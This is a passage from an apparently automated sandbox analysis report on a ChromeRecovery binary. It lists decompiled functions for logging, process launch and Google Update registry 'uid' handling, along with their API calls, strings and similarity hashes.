0x00000000
0x00000000
0x00000000
0x00c823a2
0x00c82399
0x00c82390
0x00c82383
0x00c822ff
0x00c82307
0x00c8230a
0x00c8230f
0x00c82313
0x00c82316
0x00c8231c
0x00c8231f
0x00000000
0x00c82321
0x00c82321
0x00c82324
0x00c82326
0x00c8232c
0x00c8232e
0x00c82331
0x00c8234d
0x00c8234e
0x00c82351
0x00c82354
0x00c82356
0x00000000
0x00000000
0x00c82358
0x00000000
0x00c82356
0x00c82555
0x00c82557
0x00c82558
0x00c8255f
0x00c82562
0x00c82570
0x00c82575
0x00c8257a
0x00c8257d
0x00c82582
0x00c82585
0x00c82588
0x00c8258b
0x00c8258d
0x00c8258f
0x00c8258f
0x00c82594
0x00c825a0
0x00c825a6
0x00c825ab
0x00c825ae
0x00c825af
0x00c825af
0x00000000
0x00c82326
0x00c8231f
0x00c822fd
0x00c822bd
0x00c8229e
0x00c82290
0x00c8225c

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00C82316
type_info::operator==.LIBVCRUNTIME ref: 00C8233D
___TypeMatch.LIBVCRUNTIME ref: 00C82448
___DestructExceptionObject.LIBVCRUNTIME ref: 00C824CF
IsInExceptionSpec.LIBVCRUNTIME ref: 00C82512
___DestructExceptionObject.LIBVCRUNTIME ref: 00C82558
__CxxThrowException@8.LIBVCRUNTIME ref: 00C82570
_UnwindNestedFrames.LIBCMT ref: 00C82594
CallUnexpected.LIBVCRUNTIME ref: 00C825AF

Strings

csm, xrefs: 00C82256
csm, xrefs: 00C82373
csm, xrefs: 00C822C3

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: Exception$DestructObjectSpec$CallException@8FramesMatchNestedThrowTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 1699967666-393685449
Opcode ID: e5460fc5ca0877e12d9c75483fabd6f30f5d1d86f6b1ce1ff093ff0eb1ed9313
Instruction ID: ee93728d8ba62fe03fe993b27ebc2c052619f2188bf4860f9de258ceb75e2584
Opcode Fuzzy Hash: e5460fc5ca0877e12d9c75483fabd6f30f5d1d86f6b1ce1ff093ff0eb1ed9313
Instruction Fuzzy Hash: 53B18F71800209EFCF29EF94C8999AEBBB9FF04318F044159E8256B252D731DA51DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00C74586 Relevance: 15.1, APIs: 10, Instructions: 137
filestringsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00C74586(void* __ecx, intOrPtr _a4) {
				void* _v12;
				long _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __ebp;
				int _t48;
				signed int _t50;
				signed int _t51;
				void* _t53;
				void* _t54;
				void* _t74;
				long _t80;
				signed int _t94;
				void* _t98;
				intOrPtr _t103;
				void* _t112;

				_push(_t74);
				_t98 = __ecx;
				if( *((char*)(__ecx + 8)) == 0) {
					_t48 = E00C7402F(_t74, __ecx, __ecx);
				}
				if( *((char*)(_t98 + 9)) == 0) {
					L21:
					return _t48;
				}
				_t48 = E00C7470B(_t98);
				if(_t48 == 0) {
					goto L21;
				}
				_t80 = SetFilePointer( *(_t98 + 0x18), 0, 0, 2);
				_t50 =  *(_t98 + 4);
				_t94 = 0xa;
				_t95 = _t50 * _t94 >> 0x20;
				_t51 = _t50 * _t94;
				_t112 = 0 - _t50 * _t94 >> 0x20;
				if(_t112 < 0 || _t112 <= 0 && _t80 < _t51) {
					L8:
					SetFilePointer( *(_t98 + 0x18), 0, 0, 2);
					_t103 = _a4;
					_v16 = 0;
					_t53 =  *(_t103 + 8);
					if(_t53 != 0) {
						_push(_t53);
						if( *((char*)(_t98 + 0xb)) == 0) {
							E00C7189E( &_v12, _t95, __eflags);
							_t95 =  &_v16;
							E00C713C0(E00C7758C( &_v12,  &_v16, __eflags), _v16 - 0x10);
							E00C713C0(WriteFile( *(_t98 + 0x18), _v12,  *(_v12 - 0xc),  &_v20, 0), _v12 - 0x10);
							_t103 = _a4;
						} else {
							WriteFile( *(_t98 + 0x18),  *(_t103 + 8), lstrlenW() + _t71,  &_v16, 0);
						}
					}
					_t54 =  *(_t103 + 0xc);
					if(_t54 != 0) {
						_push(_t54);
						if( *((char*)(_t98 + 0xb)) == 0) {
							E00C7189E( &_v12, _t95, __eflags);
							E00C713C0(E00C7758C( &_v12,  &_v16, __eflags), _v16 - 0x10);
							E00C713C0(WriteFile( *(_t98 + 0x18), _v12,  *(_v12 - 0xc),  &_v20, 0), _v12 - 0x10);
						} else {
							WriteFile( *(_t98 + 0x18),  *(_t103 + 0xc), lstrlenW() + _t62,  &_v16, 0);
						}
					}
					_push(0);
					_push( &_v16);
					if( *((char*)(_t98 + 0xb)) == 0) {
						_push(2);
						_push("\r\n");
					} else {
						_push(4);
						_push(L"\r\n");
					}
					_t48 = WriteFile( *(_t98 + 0x18), ??, ??, ??, ??);
					if( *(_t98 + 0x10) != 0) {
						_t48 = ReleaseMutex( *(_t98 + 0x10));
					}
					goto L21;
				} else {
					_t48 = E00C74375(_t98);
					if(_t48 == 0) {
						goto L21;
					}
					goto L8;
				}
			}

0x00c7458f
0x00c74592
0x00c74598
0x00c7459a
0x00c7459a
0x00c745a3
0x00c74702
0x00c74708
0x00c74708
0x00c745ab
0x00c745b2
0x00000000
0x00000000
0x00c745c9
0x00c745cb
0x00c745d0
0x00c745d1
0x00c745d1
0x00c745d3
0x00c745d5
0x00c745ec
0x00c745f3
0x00c745f5
0x00c745f8
0x00c74602
0x00c74607
0x00c7460d
0x00c7460e
0x00c7462e
0x00c74633
0x00c74647
0x00c74663
0x00c74668
0x00c74610
0x00c74626
0x00c74626
0x00c7460e
0x00c7466b
0x00c74670
0x00c74676
0x00c74677
0x00c74697
0x00c746b0
0x00c746cc
0x00c74679
0x00c7468f
0x00c7468f
0x00c74677
0x00c746d9
0x00c746db
0x00c746dc
0x00c746e7
0x00c746e9
0x00c746de
0x00c746de
0x00c746e0
0x00c746e0
0x00c746f1
0x00c746f7
0x00c746fc
0x00c746fc
0x00000000
0x00c745dd
0x00c745df
0x00c745e6
0x00000000
0x00000000
0x00000000
0x00c745e6

APIs

SetFilePointer.KERNEL32 ref: 00C745C7
SetFilePointer.KERNEL32 ref: 00C745F3
lstrlenW.KERNEL32 ref: 00C74610
WriteFile.KERNEL32(?,?,00000000,00000000,00000000), ref: 00C74626
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C7465E
lstrlenW.KERNEL32 ref: 00C74679
WriteFile.KERNEL32(?,?,00000000,00000000,00000000), ref: 00C7468F
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C746C7
WriteFile.KERNEL32(?,00CA3F40,00000002,?,00000000), ref: 00C746F1
ReleaseMutex.KERNEL32(00000000), ref: 00C746FC

Part of subcall function 00C7402F: OutputDebugStringW.KERNEL32 ref: 00C7406E

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: File$Write$Pointerlstrlen$DebugMutexOutputReleaseString
String ID:
API String ID: 2872164957-0
Opcode ID: 34d51d765d03ea4a195445e06203090435661db86304913ddbe9b49b221cf43a
Instruction ID: d0073d8df1327503e9347222cc89c17592d12051824b0cc6bd7a8a86e9fbc7e7
Opcode Fuzzy Hash: 34d51d765d03ea4a195445e06203090435661db86304913ddbe9b49b221cf43a
Instruction Fuzzy Hash: 1C419B71204242BFEB18DF20CC86F6ABBA9FF41304F04C919F569560E0EB60ED54DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00C7ABD5 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 150
processCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00C7ABD5(WCHAR** __ecx, void* __edx) {
				char _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				signed int _v28;
				void* _v32;
				signed int _v36;
				struct _PROCESS_INFORMATION _v52;
				struct _STARTUPINFOW _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t50;
				void* _t59;
				WCHAR* _t62;
				WCHAR* _t75;
				WCHAR* _t83;
				signed int _t87;
				void* _t112;
				void* _t113;
				WCHAR** _t116;
				char** _t118;
				signed int _t121;

				_t111 = __edx;
				_t116 = __ecx;
				_push(_t112);
				asm("sbb ecx, ecx");
				_t87 =  ~( *0xca9f1d & 0x000000ff) & 0x00ca9e40;
				if(_t87 != 0) {
					_t1 =  &_v28;
					 *_t1 = _v28 | 0xffffffff;
					_t121 =  *_t1;
					_v36 = _t87;
					_v32 = 7;
					_v24 = E00C73993(_t87, __edx, _t87, 0xffffffff);
					E00C715DB( &_v36, L"[StartProcessWithNoExceptionHandler][%s]",  *_t116);
					_t118 =  &(_t118[3]);
				}
				_t83 = 0;
				_v16 = 0;
				_t50 = E00C71D4C(0, _t111, _t112, 0x18);
				 *_t118 = "1";
				 *_t50 = _t50;
				 *((intOrPtr*)(_t50 + 4)) = _t50;
				 *((intOrPtr*)(_t50 + 8)) = _t50;
				 *((short*)(_t50 + 0xc)) = 0x101;
				_v20 = _t50;
				E00C7189E( &_v12, _t111, _t121);
				E00C7189E( &_v8, _t111, _t121, L"GOOGLE_UPDATE_NO_CRASH_HANDLER");
				E00C7D82F( &_v20, _t111,  &_v8);
				E00C7DBAD( &_v20,  &_v28,  &_v8);
				_t59 = E00C74860(_v28 + 0x14, _t116,  &_v12);
				_t23 = _v8 - 0x10; // 0xe8f04e8d
				E00C713C0(E00C713C0(_t59, _t23), _v12 - 0x10);
				_t113 = 0;
				_v28 = 0;
				_v32 = 0;
				_v24 = 0;
				_t62 = GetEnvironmentStringsW();
				_v12 = _t62;
				_t122 = _t62;
				if(_t62 == 0) {
					L8:
					_t83 = E00C77ED7();
				} else {
					_push( &_v32);
					_push(_t62);
					E00C7D5F9( &_v20, _t122);
					FreeEnvironmentStringsW(_v12);
					_t113 = _v32;
					if(_t113 == _v28) {
						goto L8;
					} else {
						_v124.cb = 0x44;
						E00C81190(_t113,  &(_v124.lpReserved), 0, 0x40);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t75 =  *_t116;
						if( *((intOrPtr*)(_t75 - 4)) > 1) {
							E00C71CAB(0,  &_v52, _t116,  *((intOrPtr*)(_t75 - 0xc)));
							_t75 =  *_t116;
						}
						_t113 = _v32;
						if(CreateProcessW(_t83, _t75, _t83, _t83, _t83, 0x400, _t113, _t83,  &_v124,  &_v52) == 0) {
							goto L8;
						} else {
							CloseHandle(_v52);
							CloseHandle(_v52.hThread);
						}
					}
				}
				if(_t113 != 0) {
					E00C71D20(_t83, _t113, _t113, _v24 - _t113 & 0xfffffffe);
				}
				E00C71D72( &_v20, _t83,  &_v20, _t111,  &_v20,  *((intOrPtr*)(_v20 + 4)));
				E00C71D20(_t83, _t113, _v20, 0x18);
				return _t83;
			}

0x00c7abd5
0x00c7abdd
0x00c7abe8
0x00c7abe9
0x00c7abeb
0x00c7abf1
0x00c7abf3
0x00c7abf3
0x00c7abf3
0x00c7abfa
0x00c7abfd
0x00c7ac0b
0x00c7ac17
0x00c7ac1c
0x00c7ac1c
0x00c7ac1f
0x00c7ac23
0x00c7ac26
0x00c7ac2e
0x00c7ac35
0x00c7ac37
0x00c7ac3a
0x00c7ac3d
0x00c7ac43
0x00c7ac46
0x00c7ac53
0x00c7ac5f
0x00c7ac6f
0x00c7ac7e
0x00c7ac86
0x00c7ac94
0x00c7ac99
0x00c7ac9b
0x00c7ac9e
0x00c7aca1
0x00c7aca4
0x00c7acaa
0x00c7acad
0x00c7acaf
0x00c7ad39
0x00c7ad3e
0x00c7acb5
0x00c7acb8
0x00c7acb9
0x00c7acbd
0x00c7acc5
0x00c7accb
0x00c7acd1
0x00000000
0x00c7acd3
0x00c7acd8
0x00c7ace1
0x00c7aceb
0x00c7acef
0x00c7acf0
0x00c7acf1
0x00c7acf2
0x00c7acf8
0x00c7acff
0x00c7ad04
0x00c7ad04
0x00c7ad06
0x00c7ad25
0x00000000
0x00c7ad27
0x00c7ad30
0x00c7ad35
0x00c7ad35
0x00c7ad25
0x00c7acd1
0x00c7ad42
0x00c7ad4e
0x00c7ad54
0x00c7ad61
0x00c7ad6b
0x00c7ad78

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00C7ACA4
FreeEnvironmentStringsW.KERNEL32(?,00000000,?), ref: 00C7ACC5
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 00C7AD1D
CloseHandle.KERNEL32 ref: 00C7AD30
CloseHandle.KERNEL32 ref: 00C7AD35

Part of subcall function 00C77ED7: GetLastError.KERNEL32 ref: 00C77ED8
Part of subcall function 00C77ED7: RaiseException.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C77F0A

Strings

D, xrefs: 00C7ACD8
[StartProcessWithNoExceptionHandler][%s], xrefs: 00C7AC11
GOOGLE_UPDATE_NO_CRASH_HANDLER, xrefs: 00C7AC4B

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CloseEnvironmentHandleStrings$CreateErrorExceptionFreeLastProcessRaise
String ID: D$GOOGLE_UPDATE_NO_CRASH_HANDLER$[StartProcessWithNoExceptionHandler][%s]
API String ID: 2068473527-3082069127
Opcode ID: c850be7934c7cc05304904aa94f88c90deee388c6e78cc50cc99f53c36b916a3
Instruction ID: 09e682c71f0893fccdab56a4250d739f97c2318ef95bba486b7947690e89dfc6
Opcode Fuzzy Hash: c850be7934c7cc05304904aa94f88c90deee388c6e78cc50cc99f53c36b916a3
Instruction Fuzzy Hash: 81517F71910109AFDB15DFA8CC86DEEBBB8EF44304F14812DE51AA7191EB749A04DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A46A Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 144
registryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00C7A46A(void* __ebx, long __ecx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				int* _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				int* _v44;
				char _v48;
				char _v52;
				void* __ebp;
				signed int _t40;
				char* _t46;
				long _t54;
				long _t58;
				long _t62;
				long _t73;
				char* _t76;
				long _t97;
				intOrPtr _t102;
				signed int _t103;
				void* _t104;

				_t40 =  *0xca8008; // 0x617e0cdd
				_v8 = _t40 ^ _t103;
				_t73 = __ecx;
				_t107 = __ecx;
				if(__ecx == 0 || E00C7CCD0(_t107) == 0) {
					_v32 = 0xca4400;
					_t95 =  &_v32;
					_v28 = 0;
					E00C7A002(_t73,  &_v32, __eflags);
					_t76 =  &_v32;
					 *((intOrPtr*)(_v32 + 4))();
					_v48 = 0xca41c0;
					_v44 = 0;
					_v40 = 0x200;
					E00C7B8E6( &_v32);
					_t46 = L"HKLM\\Software\\Google\\Update\\";
					__eflags = _t73;
					if(__eflags == 0) {
						_t46 = L"HKCU\\Software\\Google\\Update\\";
					}
					_t97 = E00C7801F( &_v48, _t95, __eflags, _t46, _t76, _t76, 0xf003f, _t76, 0);
					__eflags = _t97;
					if(_t97 < 0) {
						L18:
						_v48 = 0xca41c0;
						E00C77F74( &_v48);
						 *((intOrPtr*)(_v32 + 8))();
						E00C77AB9( &_v32);
						goto L19;
					} else {
						_t54 = RegQueryValueExW(_v44, L"uid", 0, 0, 0, 0);
						__eflags = _t54;
						if(_t54 != 0) {
							E00C71AD8( &_v36, _t95, E00C713D8());
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_t58 =  &_v24;
							__imp__CoCreateGuid(_t58);
							__eflags = _t58;
							if(__eflags >= 0) {
								_t95 =  &_v24;
								E00C713C0(E00C74860( &_v36, 0, E00C763BB( &_v52,  &_v24,  &_v24, 0, __eflags)), _v52 - 0x10);
								_t58 = 0;
								__eflags = 0;
							}
							_t102 = _v36;
							if(__eflags < 0) {
								L16:
								_t97 = _t58;
								goto L17;
							} else {
								_t97 = 1;
								_t58 = E00C7864C( &_v48, L"uid", _t102, 1);
								__eflags = _t58;
								if(__eflags < 0) {
									goto L16;
								}
								EnterCriticalSection(0xca8b60);
								 *0xca8b38 =  *0xca8b38 + 1;
								asm("adc dword [0xca8b3c], 0x0");
								LeaveCriticalSection(0xca8b60);
								E00C7A413( &_v48, _t95, __eflags);
								_v20 = 0;
								_v16 = 0;
								_v12 = 0;
								_t62 = E00C79D31( &_v20, _t95, 1, __eflags);
								__eflags = _t62;
								if(_t62 >= 0) {
									__eflags = _v20 - _v16;
									if(_v20 != _v16) {
										E00C7A789(_t104 - 0xc,  &_v20);
										_t97 = E00C7A063(_t73, __eflags);
									}
								}
								_t58 = E00C751E9();
								L17:
								E00C713C0(_t58, _t102 - 0x10);
								goto L18;
							}
						}
						_t97 = 0;
						goto L18;
					}
				} else {
					L19:
					return E00C7F35B(_v8 ^ _t103);
				}
			}

0x00c7a470
0x00c7a477
0x00c7a47b
0x00c7a47f
0x00c7a481
0x00c7a498
0x00c7a49f
0x00c7a4a2
0x00c7a4a7
0x00c7a4af
0x00c7a4b2
0x00c7a4b5
0x00c7a4bc
0x00c7a4bf
0x00c7a4c6
0x00c7a4cb
0x00c7a4d0
0x00c7a4d2
0x00c7a4d4
0x00c7a4d4
0x00c7a4eb
0x00c7a4ed
0x00c7a4ef
0x00c7a5f1
0x00c7a5f4
0x00c7a5fb
0x00c7a606
0x00c7a60c
0x00000000
0x00c7a4f5
0x00c7a501
0x00c7a507
0x00c7a509
0x00c7a51b
0x00c7a525
0x00c7a526
0x00c7a527
0x00c7a528
0x00c7a529
0x00c7a52d
0x00c7a533
0x00c7a535
0x00c7a537
0x00c7a551
0x00c7a556
0x00c7a558
0x00c7a558
0x00c7a55a
0x00c7a55d
0x00c7a5e7
0x00c7a5e7
0x00000000
0x00c7a563
0x00c7a568
0x00c7a570
0x00c7a575
0x00c7a577
0x00000000
0x00000000
0x00c7a57e
0x00c7a584
0x00c7a58f
0x00c7a596
0x00c7a59f
0x00c7a5a9
0x00c7a5ac
0x00c7a5af
0x00c7a5b2
0x00c7a5b7
0x00c7a5b9
0x00c7a5be
0x00c7a5c1
0x00c7a5cc
0x00c7a5db
0x00c7a5db
0x00c7a5c1
0x00c7a5e0
0x00c7a5e9
0x00c7a5ec
0x00000000
0x00c7a5ec
0x00c7a55d
0x00c7a50b
0x00000000
0x00c7a50b
0x00c7a48c
0x00c7a613
0x00c7a621
0x00c7a621

APIs

RegQueryValueExW.ADVAPI32(?,uid,00000000,00000000,00000000,00000000), ref: 00C7A501
CoCreateGuid.OLE32(?,00000000,?,?,000F003F,?,00000000), ref: 00C7A52D
EnterCriticalSection.KERNEL32(00CA8B60,uid,?,00000001,?,?,000F003F,?,00000000), ref: 00C7A57E
LeaveCriticalSection.KERNEL32(00CA8B60,?,?,000F003F,?,00000000), ref: 00C7A596

Strings

HKCU\Software\Google\Update\, xrefs: 00C7A4D4, 00C7A4E2
old-uid, xrefs: 00C7A47E
uid, xrefs: 00C7A4F9, 00C7A56B
HKLM\Software\Google\Update\, xrefs: 00C7A4CB

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CriticalSection$CreateEnterGuidLeaveQueryValue
String ID: HKCU\Software\Google\Update\$HKLM\Software\Google\Update\$old-uid$uid
API String ID: 969061735-2370829567
Opcode ID: ce138b66447ee05de1720bcdca4c2342dd71f0bb16a04b1bb69c70ee5c1ef994
Instruction ID: a82f1537454462dbc69d1ecf9c5405f19158e158d0a3764f67f602e78e49ecb9
Opcode Fuzzy Hash: ce138b66447ee05de1720bcdca4c2342dd71f0bb16a04b1bb69c70ee5c1ef994
Instruction Fuzzy Hash: 5341A671D0011A9BCB04EBB5DC5A9EFBBB8EF85344B108025F41AB7151EF709909DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C7444D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 118
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00C7444D(void* __ebx, WCHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				short _v108;
				int _v112;
				int* _v116;
				WCHAR* _v120;
				int _v124;
				signed int _v128;
				void* __ebp;
				signed int _t39;
				void** _t42;
				int _t63;
				signed int _t65;
				signed int _t67;
				signed int _t82;
				WCHAR* _t83;
				int _t86;
				char* _t87;
				signed int _t88;

				_t39 =  *0xca8008; // 0x617e0cdd
				_v8 = _t39 ^ _t88;
				_v120 = __ecx;
				_t67 = 0x18;
				_t42 = memcpy( &_v108, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager", _t67 << 2);
				_t65 = 0;
				asm("movsw");
				_v116 = 0;
				if(RegOpenKeyExW(0x80000002,  &_v108, 0, 0x20019, _t42) != 0) {
					L15:
					__eflags = 0;
				} else {
					_t86 = 7;
					_v112 = 0;
					_v124 = _t86;
					if(RegQueryValueExW(_v116, L"PendingFileRenameOperations", 0,  &_v124, 0,  &_v112) != 0) {
						goto L15;
					} else {
						_t94 = _v124 - _t86;
						if(_v124 != _t86) {
							goto L15;
						} else {
							_push(_v112);
							_t87 = E00C93DB5(_t94);
							E00C81190(RegQueryValueExW, _t87, 0, _v112);
							if(RegQueryValueExW(_v116, L"PendingFileRenameOperations", 0, 0, _t87,  &_v112) == 0) {
								_t82 = _v112 >> 1;
								_v128 = _t82;
								if(_t82 - 2 <= 0xffffd && _t87[_t82 * 2 - 4] == 0) {
									_t98 = _t87[_t82 * 2 - 2];
									if(_t87[_t82 * 2 - 2] == 0) {
										_t59 = E00C747AE( &_v120, L"\\??\\", _t98,  &(_v120[0xa]));
										_t83 = _v120;
										if(_t82 == 0) {
											L10:
											_t65 = _t65 | 0xffffffff;
										} else {
											while(lstrcmpW(_t87 + _t65 * 2, _t83) != 0) {
												_t63 = lstrlenW(_t87 + _t65 * 2);
												_t59 = _t63 + 1;
												_t65 = _t65 + _t63 + 1;
												if(_t65 < _v128) {
													continue;
												} else {
													goto L10;
												}
												goto L11;
											}
										}
										L11:
										_t65 = _t65 & 0xffffff00 | _t65 != 0xffffffff;
										E00C713C0(_t59, _t83 - 0x10);
									}
								}
							}
							if(_t87 != 0) {
								L00C7F9A7(_t87);
							}
						}
					}
				}
				return E00C7F35B(_v8 ^ _t88);
			}

0x00c74453
0x00c7445a
0x00c74462
0x00c74468
0x00c74471
0x00c74479
0x00c74485
0x00c74487
0x00c74492
0x00c74575
0x00c74575
0x00c74498
0x00c744a3
0x00c744a9
0x00c744b6
0x00c744bd
0x00000000
0x00c744c3
0x00c744c3
0x00c744c6
0x00000000
0x00c744cc
0x00c744cc
0x00c744d7
0x00c744db
0x00c744f6
0x00c744fb
0x00c744fd
0x00c74508
0x00c74511
0x00c74516
0x00c74527
0x00c7452e
0x00c74532
0x00c74555
0x00c74555
0x00000000
0x00c74534
0x00c74547
0x00c7454d
0x00c7454e
0x00c74553
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c74553
0x00c74534
0x00c74558
0x00c7455e
0x00c74561
0x00c74561
0x00c74516
0x00c74508
0x00c74568
0x00c7456b
0x00c74570
0x00c74571
0x00c744c6
0x00c744bd
0x00c74585

APIs

RegOpenKeyExW.ADVAPI32 ref: 00C7448A
RegQueryValueExW.ADVAPI32(?,PendingFileRenameOperations,00000000,?,00000000,?), ref: 00C744B9
RegQueryValueExW.ADVAPI32(?,PendingFileRenameOperations,00000000,00000000,00000000,?), ref: 00C744F2
lstrcmpW.KERNEL32 ref: 00C74539
lstrlenW.KERNEL32 ref: 00C74547

Strings

PendingFileRenameOperations, xrefs: 00C744AE, 00C744EA
\??\, xrefs: 00C74521
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00C74469

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: QueryValue$Openlstrcmplstrlen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\??\
API String ID: 2090349685-3703331852
Opcode ID: 250090d3a7650749323369e26916c4a479b56d99094b06880215eb64571db382
Instruction ID: 2593c096aa308970bc6b1102043c68bafc2575c4a9ec50814718645df05196e9
Opcode Fuzzy Hash: 250090d3a7650749323369e26916c4a479b56d99094b06880215eb64571db382
Instruction Fuzzy Hash: 0C319E71D0020DAFDF25EFB4CC859EEB7BCEF45754B20822AE429A7151EB309A06CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A2B7 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 121
registryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00C7A2B7(int* __ecx, void* __edx, void* __eflags) {
				int* _v8;
				int* _v12;
				int* _v16;
				void* _v20;
				char _v24;
				intOrPtr _v28;
				void* _v32;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short* _t44;
				int* _t50;
				int* _t51;
				void* _t52;
				int* _t69;
				void* _t91;

				_v24 = 0xca4400;
				_t94 = 0;
				_t89 =  &_v24;
				_t69 = __ecx;
				_v20 = 0;
				E00C7A002(__ecx,  &_v24, __eflags);
				 *((intOrPtr*)(_v24 + 4))(_t91);
				_v36 = 0xca41c0;
				_v32 = 0;
				_v28 = 0x200;
				E00C7B8E6( &_v24);
				_t44 = L"HKLM\\Software\\Google\\Update\\";
				_t98 = _t69;
				if(_t69 == 0) {
					_t44 = L"HKCU\\Software\\Google\\Update\\";
				}
				E00C780D1( &_v36, _t89, _t98, _t44, 0xf003f);
				_t92 = L"old-uid";
				if(RegQueryValueExW(_v32, L"old-uid", _t94, _t94, _t94, _t94) != 0) {
					_v8 = _t94;
					_v16 = _t94;
					_v12 = _t94;
					_t50 = E00C785EB( &_v36, __eflags,  &_v36,  &_v8,  &_v16,  &_v12);
					__eflags = _t50;
					if(_t50 >= 0) {
						_t94 = _v8;
						_t51 = E00C78688( &_v36, L"old-uid", _t94, _v16, _v12);
						__eflags = _t51;
						if(_t51 >= 0) {
							E00C77F44( &_v36, L"uid");
						}
						__eflags = _t94;
						if(_t94 == 0) {
							L12:
							__eflags = _t69;
							if(_t69 != 0) {
								E00C71AD8( &_v8, _t89, E00C713D8());
								E00C784EE( &_v36, _t89, _t92,  &_v8);
								_push(E00C83694(L"; legacy"));
								E00C7492A(_t69,  &_v8, _t92, L"; legacy", L"; legacy");
								_t94 = _v8;
								E00C713C0(E00C7864C( &_v36, _t92, _v8, 1), _v8 - 0x10);
							}
							goto L14;
						} else {
							_push(_t94);
							L11:
							L00C7F9A7();
							goto L12;
						}
					}
					__eflags = _v8 - _t94;
					if(_v8 == _t94) {
						goto L12;
					}
					_push(_v8);
					goto L11;
				} else {
					E00C77F44( &_v36, L"uid");
					L14:
					_t52 = E00C7A46A(_t69, _t69, _t92, _t94);
					_v36 = 0xca41c0;
					E00C77F74( &_v36);
					 *((intOrPtr*)(_v24 + 8))();
					E00C77AB9( &_v24);
					return _t52;
